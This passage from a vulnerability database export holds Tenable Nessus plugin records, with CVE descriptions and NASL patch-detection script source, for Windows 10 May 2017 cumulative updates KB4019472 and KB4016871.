is,\ntherefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). 
(CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. 
(CVE-2017-0221)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. 
(CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019472/windows-10-update-kb4019472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?038b505a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019472.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-05';\nkbs = make_list(4019472);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Windows 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:30", "description": "The remote Windows 10 version 1703 host is missing security update KB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0224)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. 
An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. 
A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0223", "CVE-2017-0224", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0235", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": 
"2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_MAY_4016871.NASL", "href": "https://www.tenable.com/plugins/nessus/100055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100055);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0223\",\n \"CVE-2017-0224\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0235\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98214,\n 98217,\n 98222,\n 98229,\n 98230,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98452\n );\n script_xref(name:\"MSKB\", value:\"4016871\");\n script_xref(name:\"MSFT\", value:\"MS17-4016871\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. 
(CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. 
(CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n 